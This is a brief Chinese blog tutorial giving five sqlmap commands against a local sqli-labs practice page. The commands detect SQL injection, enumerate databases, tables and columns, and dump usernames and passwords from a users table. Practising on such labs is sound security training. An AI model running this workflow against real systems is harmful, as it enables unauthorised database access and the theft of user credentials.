sqlmap 扫描注入漏洞

 1 1、检测是否存在漏洞:
 2 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3
 3 2、获取数据库信息:
 4 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1"  --dbms mysql --level 3 --dbs
 5 3、数据库表信息:
 6 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1"  --dbms mysql --level 3 -D security --tables
 7 4、表中字段信息
 8 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users --columns
 9 5、字段值数据
10 sqlmap -u "http://127.0.0.1/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users -C "username,password" --dump

 

posted @ 2019-03-22 22:55  Python研究者  阅读(932)  评论(0编辑  收藏  举报